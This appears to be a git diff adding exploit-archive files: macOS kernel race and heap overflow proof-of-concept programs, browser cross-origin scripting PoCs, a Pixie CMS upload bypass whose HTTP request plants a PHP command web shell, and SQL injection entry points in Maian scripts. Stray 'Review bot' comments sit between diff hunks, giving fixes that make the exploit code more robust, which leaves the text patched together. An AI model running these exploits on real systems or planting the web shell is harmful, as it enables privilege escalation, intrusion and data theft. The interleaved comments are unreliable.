+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+
+in: "...that other processes can now look up the new fd and get the associated fp..." I meant threads, not processes!
+
+*/
+
+// ianbeer
+#if 0
+MacOS/iOS kernel uaf due to bad locking in necp_open
+
+necp_open is a syscall used to obtain a new necp file descriptor
+
+The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.
+
+Here's the relevant code from necp_open:
+
+ error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)
+ if (error != 0) {
+ goto done;
+ }
+
+ if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,
+ M_WAITOK | M_ZERO)) == NULL) {
+ error = ENOMEM;
+ goto done;
+ }
+
+ fd_data->flags = uap->flags;
+ LIST_INIT(&fd_data->clients);
+ lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);
+ klist_init(&fd_data->si.si_note);
+ fd_data->proc_pid = proc_pid(p);
+
+ fp->f_fglob->fg_flag = FREAD;
+ fp->f_fglob->fg_ops = &necp_fd_ops;
+ fp->f_fglob->fg_data = fd_data; <-------------------------- (b)
+
+ proc_fdlock(p);
+
+ *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);
+ procfdtbl_releasefd(p, fd, NULL);
+ fp_drop(p, fd, fp, 1);
+ proc_fdunlock(p); <--------------------- (c)
+
+ *retval = fd;
+
+ lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)
+ LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)
+ lck_rw_done(&necp_fd_lock);
+
+at (a) a new file descriptor and file object is allocated for the calling process
+at (b) that new file's fg_data is set to the fd_data heap allocation
+at (c) the process fd table is unlocked meaning that other processes can now look up
+ the new fd and get the associated fp
+
+at (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list
+
+The bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)
+another thread can call close on the new fd which will free fd_data before we enqueue it at (e).
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+#endif
+
+#include
+#include
+#include
+#include
+
+#include
+
+int necp_open(int flags) {
+ return syscall(SYS_necp_open, flags);
+}
+
+void* closer(void* arg) {
+ while(1) {
+ close(3);
+ }
+}
+
+int main() {
+ for (int i = 0; i < 10; i++) {
+ pthread_t t;
+ pthread_create(&t, NULL, closer, NULL);
+ }
+
+ while (1) {
+ int fd = necp_open(0);
+ close(fd);
+ }
+
+ return 0;
+}
diff --git a/platforms/multiple/dos/41796.c b/platforms/multiple/dos/41796.c
new file mode 100755
index 000000000..70f5291d4
--- /dev/null
+++ b/platforms/multiple/dos/41796.c
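Review bot: `closer` hard-codes descriptor 3 and the file never states the assumption that 0–2 are the only open descriptors when `main` starts, so the value returned by `necp_open` is 3; add a comment above `closer` such as `// assumes stdin/stdout/stderr are the only open fds, so necp_open() below returns 3`. `closer` is declared `void*` but falls off the end without a `return`, and `arg` is unused; `return NULL;` after the loop (or `(void)arg;`) keeps `-Wreturn-type`/`-Wunused-parameter` clean. `necp_open` passes the raw `syscall` result back unchecked, so a -1 (e.g. the syscall number not existing on this build) goes straight into `close(fd)` in the `main` loop and the program spins without reporting it; `pthread_create`'s return value is also ignored.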
@@ -0,0 +1,166 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1125
+
+The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:
+
+ case BIOCSBLEN: /* u_int */
+ if (d->bd_bif != 0)
+ error = EINVAL;
+ else {
+ u_int size;
+
+ bcopy(addr, &size, sizeof (size));
+
+ if (size > bpf_maxbufsize)
+ size = bpf_maxbufsize;
+ else if (size < BPF_MINBUFSIZE)
+ size = BPF_MINBUFSIZE;
+ bcopy(&size, addr, sizeof (size));
+ d->bd_bufsize = size;
+ }
+ break;
+
+
+d->bd_bif is set to the currently attached interface, so we can't change the length if we're already
+attached to an interface.
+
+There's no ioctl command to detach us from an interface, but we can just destroy the interface
+(by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger
+length which will set d->bd_bufsize to a new, larger value.
+
+If we then attach to an interface again we hit this code in bpf_setif:
+
+ if (d->bd_sbuf == 0) {
+ error = bpf_allocbufs(d);
+ if (error != 0)
+ return (error);
+
+This means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the
+old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size
+leading to heap corruption when packets are receive on the target interface.
+
+This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys
+the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our
+bpf device.)
+
+We then set a large buffer size and attach to the loopback interface and sent some large ping packets.
+
+This bug is a root -> kernel priv esc
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+*/
+
+//ianbeer
+#if 0
+MacOS/iOS kernel heap overflow in bpf
+
+The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:
+
+ case BIOCSBLEN: /* u_int */
+ if (d->bd_bif != 0)
+ error = EINVAL;
+ else {
+ u_int size;
+
+ bcopy(addr, &size, sizeof (size));
+
+ if (size > bpf_maxbufsize)
+ size = bpf_maxbufsize;
+ else if (size < BPF_MINBUFSIZE)
+ size = BPF_MINBUFSIZE;
+ bcopy(&size, addr, sizeof (size));
+ d->bd_bufsize = size;
+ }
+ break;
+
+
+d->bd_bif is set to the currently attached interface, so we can't change the length if we're already
+attached to an interface.
+
+There's no ioctl command to detach us from an interface, but we can just destroy the interface
+(by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger
+length which will set d->bd_bufsize to a new, larger value.
+
+If we then attach to an interface again we hit this code in bpf_setif:
+
+ if (d->bd_sbuf == 0) {
+ error = bpf_allocbufs(d);
+ if (error != 0)
+ return (error);
+
+This means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the
+old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size
+leading to heap corruption when packets are receive on the target interface.
+
+This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys
+the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our
+bpf device.)
+
+We then set a large buffer size and attach to the loopback interface and sent some large ping packets.
+
+This bug is a root -> kernel priv esc
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+#endif
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char** argv) {
+ int fd = open("/dev/bpf3", O_RDWR);
+ if (fd == -1) {
+ perror("failed to open bpf device\n");
+ exit(EXIT_FAILURE);
+ }
+
+ // first set a small length:
+ int len = 64;
+ int err = ioctl(fd, BIOCSBLEN, &len);
+ if (err == -1) {
+ perror("setting small buffer length");
+ exit(EXIT_FAILURE);
+ }
+
+ // create an interface which we can destroy later:
+ system("ifconfig bridge7 create");
+
+ // connect the bpf device to that interface, allocating the buffer
+ struct ifreq ifr;
+ strcpy(ifr.ifr_name, "bridge7");
+ err = ioctl(fd, BIOCSETIF, &ifr);
+ if (err == -1) {
+ perror("attaching to interface");
+ exit(EXIT_FAILURE);
+ }
+
+ // remove that interface, detaching us:
+ system("ifconfig bridge7 destroy");
+
+ // set a large buffer size:
+ len = 4096;
+ err = ioctl(fd, BIOCSBLEN, &len);
+ if (err == -1) {
+ perror("setting large buffer length");
+ exit(EXIT_FAILURE);
+ }
+
+ // connect to a legit interface with traffic:
+ strcpy(ifr.ifr_name, "lo0");
+ err = ioctl(fd, BIOCSETIF, &ifr);
+ if (err == -1) {
+ perror("attaching to interface");
+ exit(EXIT_FAILURE);
+ }
+
+ // wait for a packet...
+ system("ping localhost -s 1400");
+
+ return 0;
+}
diff --git a/platforms/multiple/dos/41807.html b/platforms/multiple/dos/41807.html
new file mode 100755
index 000000000..69f2fcac8
--- /dev/null
+++ b/platforms/multiple/dos/41807.html
@@ -0,0 +1,222 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/multiple/dos/41809.html b/platforms/multiple/dos/41809.html
new file mode 100755
index 000000000..c8f911950
--- /dev/null
+++ b/platforms/multiple/dos/41809.html
@@ -0,0 +1,175 @@
+
+
+
+
+
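Review bot: The `perror()` calls in main() of 41796.c embed a trailing newline, so `perror("failed to open bpf device\n")` prints the message, a line break, and only then `: <strerror text>` on a line of its own; drop the `\n` so the errno description stays on the same line (the `racer()` and `main()` perror calls in 41804.c later in this patch have the same pattern). The two `system("ifconfig bridge7 ...")` calls discard their return value, so a failed `create` or `destroy` is silent and the program continues to `BIOCSETIF` with a misleading error; `if (system("ifconfig bridge7 create") != 0) { fputs("ifconfig bridge7 create failed\n", stderr); exit(EXIT_FAILURE); }` reports the real cause. `struct ifreq ifr;` is left uninitialised and `strcpy` writes into the fixed-size `ifr_name` member without a bound; `struct ifreq ifr = {0};` together with `snprintf(ifr.ifr_name, sizeof ifr.ifr_name, "%s", "bridge7")` keeps the write bounded and the rest of the struct deterministic. `argc` and `argv` are unused, so `int main(void)` would be the accurate signature.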

+
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/41810.html b/platforms/multiple/dos/41810.html new file mode 100755 index 000000000..813abfb60 --- /dev/null +++ b/platforms/multiple/dos/41810.html @@ -0,0 +1,137 @@ + + + + +
+ + +
+
+
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/41811.html b/platforms/multiple/dos/41811.html new file mode 100755 index 000000000..43dd22078 --- /dev/null +++ b/platforms/multiple/dos/41811.html @@ -0,0 +1,195 @@ + + + + +
+ +a + + + \ No newline at end of file diff --git a/platforms/multiple/dos/41812.html b/platforms/multiple/dos/41812.html new file mode 100755 index 000000000..e68fedd4f --- /dev/null +++ b/platforms/multiple/dos/41812.html @@ -0,0 +1,170 @@ + + + + +
+
foo
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/41813.html b/platforms/multiple/dos/41813.html new file mode 100755 index 000000000..caeae44ff --- /dev/null +++ b/platforms/multiple/dos/41813.html @@ -0,0 +1,192 @@ + + + + + +
+ + + + +
foo
+
+ + + \ No newline at end of file diff --git a/platforms/multiple/dos/41814.html b/platforms/multiple/dos/41814.html new file mode 100755 index 000000000..758187250 --- /dev/null +++ b/platforms/multiple/dos/41814.html @@ -0,0 +1,195 @@ + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/local/41804.c b/platforms/multiple/local/41804.c new file mode 100755 index 000000000..3e65383d8 --- /dev/null +++ b/platforms/multiple/local/41804.c 
@@ -0,0 +1,220 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1129
+
+fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents
+
+Heres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl:
+
+ case FSEVENTS_DEVICE_FILTER_64:
+ if (!proc_is64bit(vfs_context_proc(ctx))) {
+ ret = EINVAL;
+ break;
+ }
+ devfilt_args = (fsevent_dev_filter_args64 *)data;
+
+ handle_dev_filter:
+ {
+ int new_num_devices;
+ dev_t *devices_not_to_watch, *tmp=NULL;
+
+ if (devfilt_args->num_devices > 256) {
+ ret = EINVAL;
+ break;
+ }
+
+ new_num_devices = devfilt_args->num_devices;
+ if (new_num_devices == 0) {
+ tmp = fseh->watcher->devices_not_to_watch; <------ (a)
+
+ lock_watch_table(); <------ (b)
+ fseh->watcher->devices_not_to_watch = NULL;
+ fseh->watcher->num_devices = new_num_devices;
+ unlock_watch_table(); <------ (c)
+
+ if (tmp) {
+ FREE(tmp, M_TEMP); <------ (d)
+ }
+ break;
+ }
+
+There's nothing stopping two threads seeing the same value for devices_not_to_watch at (a),
+assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this.
+
+This leads to a double free, which if you also race allocations from the same zone can lead to an
+exploitable kernel use after free.
+
+/dev/fsevents is:
+crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents
+
+so this is a privesc from either root or members of the wheel group to kernel
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+
+(build with -O3)
+
+The open handler for the fsevents device node has a further access check:
+
+ if (!kauth_cred_issuser(kauth_cred_get())) {
+ return EPERM;
+ }
+
+restricting this issue to root only despite the permissions on the device node (which is world-readable)
+*/
+
+
+// ianbeer
+#if 0
+MacOS/iOS kernel double free due to bad locking in fsevents device
+
+fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents
+
+Heres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl:
+
+ case FSEVENTS_DEVICE_FILTER_64:
+ if (!proc_is64bit(vfs_context_proc(ctx))) {
+ ret = EINVAL;
+ break;
+ }
+ devfilt_args = (fsevent_dev_filter_args64 *)data;
+
+ handle_dev_filter:
+ {
+ int new_num_devices;
+ dev_t *devices_not_to_watch, *tmp=NULL;
+
+ if (devfilt_args->num_devices > 256) {
+ ret = EINVAL;
+ break;
+ }
+
+ new_num_devices = devfilt_args->num_devices;
+ if (new_num_devices == 0) {
+ tmp = fseh->watcher->devices_not_to_watch; <------ (a)
+
+ lock_watch_table(); <------ (b)
+ fseh->watcher->devices_not_to_watch = NULL;
+ fseh->watcher->num_devices = new_num_devices;
+ unlock_watch_table(); <------ (c)
+
+ if (tmp) {
+ FREE(tmp, M_TEMP); <------ (d)
+ }
+ break;
+ }
+
+There's nothing stopping two threads seeing the same value for devices_not_to_watch at (a),
+assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this.
+
+This leads to a double free, which if you also race allocations from the same zone can lead to an
+exploitable kernel use after free.
+
+/dev/fsevents is:
+crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents
+
+so this is a privesc from either root or members of the wheel group to kernel
+
+tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
+
+(build with -O3)
+#endif
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+
+typedef uint64_t user64_addr_t;
+
+typedef struct fsevent_clone_args64 {
+ user64_addr_t event_list;
+ int32_t num_events;
+ int32_t event_queue_depth;
+ user64_addr_t fd;
+} fsevent_clone_args64;
+
+#define FSEVENTS_CLONE_64 _IOW('s', 1, fsevent_clone_args64)
+
+#pragma pack(push, 4)
+typedef struct fsevent_dev_filter_args64 {
+ uint32_t num_devices;
+ user64_addr_t devices;
+} fsevent_dev_filter_args64;
+#pragma pack(pop)
+
+#define FSEVENTS_DEVICE_FILTER_64 _IOW('s', 100, fsevent_dev_filter_args64)
+
+void* racer(void* thread_arg){
+ int fd = *(int*)thread_arg;
+ printf("started thread\n");
+
+ fsevent_dev_filter_args64 arg = {0};
+ int32_t dev = 0;
+
+ while (1) {
+ arg.num_devices = 1;
+ arg.devices = (user64_addr_t)&dev;
+ int err = ioctl(fd, FSEVENTS_DEVICE_FILTER_64, &arg);
+
+ if (err == -1) {
+ perror("error in FSEVENTS_DEVICE_FILTER_64\n");
+ exit(EXIT_FAILURE);
+ }
+
+ arg.num_devices = 0;
+ arg.devices = (user64_addr_t)&dev;
+
+ err = ioctl(fd, FSEVENTS_DEVICE_FILTER_64, &arg);
+
+ if (err == -1) {
+ perror("error in FSEVENTS_DEVICE_FILTER_64\n");
+ exit(EXIT_FAILURE);
+ }
+ }
+
+ return NULL;
+}
+int main(){
+ int fd = open("/dev/fsevents", O_RDONLY);
+ if (fd == -1) {
+ perror("can't open fsevents device, are you root?");
+ exit(EXIT_FAILURE);
+ }
+
+ // have to FSEVENTS_CLONE this to get the real fd
+ fsevent_clone_args64 arg = {0};
+ int event_fd = 0;
+ int8_t event = 0;
+
+
+ arg.event_list = (user64_addr_t)&event;
+ arg.num_events = 1;
+ arg.event_queue_depth = 1;
+ arg.fd = (user64_addr_t)&event_fd;
+
+ int err = ioctl(fd, FSEVENTS_CLONE_64, &arg);
+
+ if (err == -1) {
+ perror("error in FSEVENTS_CLONE_64\n");
+ exit(EXIT_FAILURE);
+ }
+
+ if (event_fd != 0) {
+ printf("looks like we got a new fd %d\n", event_fd);
+ } else {
+ printf("no new fd\n");
+ }
+
+ pid_t pid = fork();
+ if (pid == 0) {
+ racer(&event_fd);
+ } else {
+ racer(&event_fd);
+ }
+
+
+ return 1;
+}
\ No newline at end of file
diff --git a/platforms/multiple/webapps/41799.html b/platforms/multiple/webapps/41799.html
new file mode 100755
index 000000000..ef76c3860
--- /dev/null
+++ b/platforms/multiple/webapps/41799.html
@@ -0,0 +1,48 @@
+
+
+"use strict";
+
+document.write("click anywhere to start");
+
+window.onclick = () => {
+ let w = open("about:blank", "one");
+ let d = w.document;
+
+ let a = d.createElement("a");
+ a.href = "https://abc.xyz/";
+ a.click(); <<------- about:blank -> Document::InPageCache
+
+ let it = setInterval(() => {
+ try {
+ w.location.href.toString;
+ } catch (e) {
+ clearInterval(it);
+
+ let s = d.createElement("a"); <<------ about:blank's document
+ s.href = "javascript:alert(location)";
+ s.click();
+ }
+ }, 0);
+};
+
+
+
\ No newline at end of file
diff --git a/platforms/multiple/webapps/41800.html b/platforms/multiple/webapps/41800.html
new file mode 100755
index 000000000..3c3bcc1b4
--- /dev/null
+++ b/platforms/multiple/webapps/41800.html
@@ -0,0 +1,70 @@
+
+
+"use strict";
+
+let f = document.body.appendChild(document.createElement("iframe"));
+f.onload = () => {
+ f.onload = null;
+
+ try {
+ let iterator = document.createNodeIterator(document, NodeFilter.SHOW_ALL, f.contentWindow);
+ iterator.nextNode();
+ } catch (e) {
+ e.constructor.constructor("alert(location)")();
+ }
+};
+
+f.src = "https://abc.xyz/";
diff --git a/platforms/multiple/webapps/41801.html b/platforms/multiple/webapps/41801.html
new file mode 100755
index 000000000..644866a2b
--- /dev/null
+++ b/platforms/multiple/webapps/41801.html
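Review bot: `fork()`'s result in main() of 41804.c is only compared with 0, so a failed fork (`-1`) falls into the `else` branch and the parent runs a single `racer()` loop with no second process, and the race silently never happens; add `if (pid == -1) { perror("fork"); exit(EXIT_FAILURE); }` before the branch. `racer()` ends with `return NULL;` after a `while (1)` loop that has no `break`, and `return 1;` in main() is likewise unreachable, so both processes only ever leave via the `exit()` calls inside racer(); a one-line comment on `racer()` saying it never returns would make that lifetime explicit. `printf("started thread\n")` in racer() is misleading, since the two callers are processes created by fork() rather than threads; `printf("started racer process\n")` describes what the code does. The `#include` lines in this hunk (and in 41796.c and the necp PoC above) carry no header names on this page, which looks like rendering loss rather than patch content, but is worth confirming against the file.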
@@ -0,0 +1,51 @@
+
+
+"use strict";
+
+let f = document.body.appendChild(document.createElement("iframe"));
+let get_element = f.contentWindow.Function("return logo;");
+
+f.onload = () => {
+ f.onload = null;
+
+ let node = get_element();
+
+ var sc = document.createElement("script");
+ sc.innerText = "alert(location)";
+ node.appendChild(sc);
+};
+
+f.src = "https://abc.xyz/";
+
+
\ No newline at end of file
diff --git a/platforms/multiple/webapps/41802.html b/platforms/multiple/webapps/41802.html
new file mode 100755
index 000000000..4dd37156c
--- /dev/null
+++ b/platforms/multiple/webapps/41802.html
@@ -0,0 +1,86 @@
+
+
+var d = document.body.appendChild(document.createElement("div"));
+var s = d.attachShadow({mode: "open"});
+
+var f = s.appendChild(document.createElement("iframe"));
+
+f.onload = () => {
+ f.onload = null;
+
+ f.src = "javascript:alert(location)";
+
+ var xml = `
+
+`;
+
+ var v = document.body.appendChild(document.createElement("iframe"));
+ v.src = URL.createObjectURL(new Blob([xml], {type: "text/xml"}));
+};
+
+f.src = "https://abc.xyz/";
+
+
\ No newline at end of file
diff --git a/platforms/multiple/webapps/41803.html b/platforms/multiple/webapps/41803.html
new file mode 100755
index 000000000..be87d9141
--- /dev/null
+++ b/platforms/multiple/webapps/41803.html
@@ -0,0 +1,34 @@
+
+
+let rs = new ReadableStream();
+let cons = rs.getReader().constructor;
+
+rs.getReader = 0x12345;
+new cons(rs);
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/41784.txt b/platforms/php/webapps/41784.txt
new file mode 100755
index 000000000..de40ac858
--- /dev/null
+++ b/platforms/php/webapps/41784.txt
@@ -0,0 +1,108 @@ +# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no +# Date: 02-April-2017 +# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial +# Vendor Homepage: http://www.getpixie.co.uk +# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip +# Version: 1.0.4 +# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402 + +I. Background: +Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker. + +II. Description: +in Pixie CMS have three types for account privilege for upload: +- Administrator - Can access file manager but restricted extension for file upload. +- Client - Can access file manager but restricted extension for file upload. +- User - Cannot access file manager + +Generally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this “Upload failed. Please check that the folder is writeable and has the correct permissions set”. + +III. Exploit: +In this case, we used privilege as client and then access to “file manager” (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step: + +1. Prepare software to intercept (I used burpsuite free edtion). +2. Prepare for real image (our_shell.jpg). +3. Browse your real image on file manager pixie cms and click to upload button. +4. Intercept and change of filename “our_shell.jpg” to be “our_shell.jpg.php” +5. Under of perimeter “Content-Type: image/jpeg”, please change and write your shell. in this example, I use cmd shell. +6. 
If you done, forward your edit request in burpsuite and the pixie cms will give you information like this “our_shell.jpg.php was successfully uploaded”. +7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig) + +———— +POST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager +Cookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18 +Connection: close +Content-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949 +Content-Length: 901 + +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="upload[]"; filename="our_shell.jpg.php" +Content-Type: image/jpeg + +"; +        $cmd = ($_REQUEST['cmd']); +        system($cmd); +        echo ""; +        die; +} +?> + +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="file_tags" + +ourshell +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="submit_upload" + +Upload +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +102400 +-----------------------------8321182121675739546763935949 +Content-Disposition: form-data; name="bb2_screener_" + +1490835014 192.168.1.6 +-----------------------------8321182121675739546763935949-- + This is our screenshot from PoC:  +| | +| Upload for valid image + | + +  
+| | +| Change extension and insert your shell + | + +  +| | +| Your shell success to upload on server + | + +  +| | +| Example command for ipconfig + | + +  +| | +| Example command for net user + | + + + + +IV. Thanks to: +- Alloh SWT +- MyBoboboy +- @rungga_reksya, @dvnrcy, @dickysofficial +- Komunitas IT Auditor & IT Security Kaskus + diff --git a/platforms/php/webapps/41787.txt b/platforms/php/webapps/41787.txt new file mode 100755 index 000000000..3c4268b47 --- /dev/null +++ b/platforms/php/webapps/41787.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Maian Uploader Script v4.0 - SQL Injection +# Google Dork: N/A +# Date: 04.04.2017 +# Vendor Homepage: http://www.maiansoftware.com/ +# Software: http://www.maianuploader.com/?dl=yes +# Demo: http://www.maiansoftware.com/demos/uploader/ +# Version: 4.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/index.php?cmd=view&user=[SQL] +# mu_members:id +# mu_members:joindate +# mu_members:sign_date +# mu_members:joinstamp +# mu_members:username +# mu_members:email +# mu_members:accpass +# # # # # diff --git a/platforms/php/webapps/41788.txt b/platforms/php/webapps/41788.txt new file mode 100755 index 000000000..dc6447a1f --- /dev/null +++ b/platforms/php/webapps/41788.txt 
@@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Maian Survey v1.1 - SQL Injection +# Google Dork: N/A +# Date: 04.04.2017 +# Vendor Homepage: http://www.maiansoftware.com/ +# Software: http://www.maiansurvey.com/?dl=yes +# Demo: http://www.maiansoftware.com/demos/survey/ +# Version: 1.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?cmd=surveys&survey=[SQL] +# # # # # diff --git a/platforms/php/webapps/41789.txt b/platforms/php/webapps/41789.txt new file mode 100755 index 000000000..c3f16de9c --- /dev/null +++ b/platforms/php/webapps/41789.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Maian Greetings v2.1 - SQL Injection +# Google Dork: N/A +# Date: 04.04.2017 +# Vendor Homepage: http://www.maiansoftware.com/ +# Software: http://www.maiangreetings.com/?dl=yes +# Demo: http://www.maiansoftware.com/demos/greetings/ +# Version: 2.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?cmd=search&keywords=a&cat=[SQL] +# # # # # \ No newline at end of file